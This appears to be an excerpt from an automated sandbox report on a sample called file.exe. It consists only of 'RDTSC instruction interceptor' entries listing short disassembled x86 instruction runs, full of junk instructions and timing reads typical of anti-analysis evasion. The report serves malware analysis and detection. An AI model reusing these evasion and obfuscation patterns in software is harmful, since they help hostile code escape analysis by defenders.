                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62AFC6 second address: 62B029 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F7E2CC83C96h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jnp 00007F7E2CC83C9Ch 0x00000013 jmp 00007F7E2CC83C9Ch 0x00000018 push 00000000h 0x0000001a mov dword ptr [ebp+122D240Bh], eax 0x00000020 push 00000000h 0x00000022 mov ebx, 5BF1E700h 0x00000027 and edi, dword ptr [ebp+122D2B3Bh] 0x0000002d xchg eax, esi 0x0000002e jl 00007F7E2CC83CB1h 0x00000034 pushad 0x00000035 jl 00007F7E2CC83C96h 0x0000003b jmp 00007F7E2CC83CA3h 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A1A1 second address: 62A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B029 second address: 62B02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A1A5 second address: 62A1AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B02D second address: 62B031 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62B031 second address: 62B037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A1AE second address: 62A1BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F7E2CC83C98h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A1BF second address: 62A1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A1C5 second address: 62A1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E3DD second address: 62E459 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B848h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F7E2CD3B83Ch 0x0000000f jl 00007F7E2CD3B836h 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007F7E2CD3B838h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 pushad 0x00000034 mov edi, dword ptr [ebp+122D2B8Bh] 0x0000003a movzx esi, cx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 jnc 00007F7E2CD3B83Bh 0x00000046 push 00000000h 0x00000048 add ebx, dword ptr [ebp+122D2D1Bh] 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jno 00007F7E2CD3B83Ch 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F27A second address: 62F2ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F7E2CC83C98h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 clc 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007F7E2CC83C98h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 0000001Dh 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jc 00007F7E2CC83C96h 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E54C second address: 62E551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F2ED second address: 62F2F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630275 second address: 630279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F416 second address: 62F420 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7E2CC83C96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630279 second address: 630283 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63118F second address: 631199 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7E2CC83C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631199 second address: 63120C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 add dword ptr [ebp+122D2856h], edx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F7E2CD3B838h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b sub dword ptr [ebp+122D239Bh], ecx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push esi 0x00000036 call 00007F7E2CD3B838h 0x0000003b pop esi 0x0000003c mov dword ptr [esp+04h], esi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc esi 0x00000049 push esi 0x0000004a ret 0x0000004b pop esi 0x0000004c ret 0x0000004d jmp 00007F7E2CD3B840h 0x00000052 xchg eax, esi 0x00000053 pushad 0x00000054 pushad 0x00000055 pushad 0x00000056 popad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63120C second address: 631219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F7E2CC83C9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 631219 second address: 63122B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b ja 00007F7E2CD3B836h 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632170 second address: 632175 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632175 second address: 6321B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007F7E2CD3B83Ah 0x0000000f push 00000000h 0x00000011 mov bx, di 0x00000014 push 00000000h 0x00000016 jg 00007F7E2CD3B841h 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ebx 0x00000022 jmp 00007F7E2CD3B83Bh 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6321B3 second address: 6321BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7E2CC83C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633204 second address: 633209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633209 second address: 633213 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7E2CC83C9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630505 second address: 63051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7E2CD3B83Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63231B second address: 63231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63337B second address: 63337F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63231F second address: 632325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632325 second address: 63233E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B845h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633492 second address: 63349E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63567E second address: 635682 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636424 second address: 636428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6345D7 second address: 6345EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B844h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632433 second address: 63245B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7E2CC83CA0h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6345EF second address: 6345F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63245B second address: 63245F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635770 second address: 635776 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6374E6 second address: 637519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83C9Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F7E2CC83C9Ch 0x00000012 jmp 00007F7E2CC83CA2h 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635776 second address: 63579A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B83Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jns 00007F7E2CD3B83Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366BE second address: 6366D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CC83C9Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6366D6 second address: 6366E0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7E2CD3B83Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63A40E second address: 63A433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F7E2CC83C96h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7E2CC83CA8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E417 second address: 63E41C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E41C second address: 63E437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7E2CC83CA2h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E592 second address: 63E596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E596 second address: 63E5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7E2CC83C96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5A7 second address: 63E5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5AD second address: 63E5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7E2CC83CA5h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5CA second address: 63E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E5D2 second address: 63E5DC instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CC83C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6429EF second address: 6429F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E51 second address: 648E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E57 second address: 648E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F7E2CD3B836h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E66 second address: 648E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 648E6A second address: 648E6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64926B second address: 649298 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7E2CC83CA9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 ja 00007F7E2CC83C96h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649298 second address: 64929D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64958B second address: 649591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649591 second address: 649597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 649836 second address: 649859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F7E2CC83C9Dh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ebx 0x00000011 ja 00007F7E2CC83C9Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6227DA second address: 6227DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622AC4 second address: 622ACA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622BE8 second address: 622BEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622BEF second address: 622C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007F7E2CC83CA6h 0x00000010 pop edi 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C11 second address: 622C3A instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7E2CD3B83Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F7E2CD3B83Dh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C3A second address: 622C56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C56 second address: 622C69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7E2CD3B83Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622C69 second address: 622CF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CC83CA6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F7E2CC83C98h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 jnl 00007F7E2CC83C97h 0x00000036 call 00007F7E2CC83C99h 0x0000003b jmp 00007F7E2CC83CA5h 0x00000040 push eax 0x00000041 jmp 00007F7E2CC83C9Fh 0x00000046 mov eax, dword ptr [esp+04h] 0x0000004a push eax 0x0000004b push edx 0x0000004c jbe 00007F7E2CC83C98h 0x00000052 push esi 0x00000053 pop esi 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622E94 second address: 622EA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], esi 0x00000009 mov dl, al 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622F95 second address: 622F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622F99 second address: 622FAF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7E2CD3B836h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 ja 00007F7E2CD3B836h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 622FAF second address: 622FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623198 second address: 62319E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62319E second address: 6231A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6231A2 second address: 6231AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623540 second address: 623544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623544 second address: 62356D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7E2CD3B83Ch 0x0000000c jl 00007F7E2CD3B836h 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 sub di, 8919h 0x0000001b push 0000001Eh 0x0000001d mov ecx, dword ptr [ebp+122D2B9Fh] 0x00000023 push eax 0x00000024 push esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62356D second address: 623571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600F15 second address: 600F2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B842h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 600F2E second address: 600F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64E838 second address: 64E83E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64E83E second address: 64E844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EB1D second address: 64EB21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64ECAF second address: 64ECB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64ECB3 second address: 64ECE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7E2CD3B848h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F7E2CD3B838h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7E2CD3B83Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EFAE second address: 64EFB4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64EFB4 second address: 64EFBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654A39 second address: 654A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jc 00007F7E2CC83C98h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
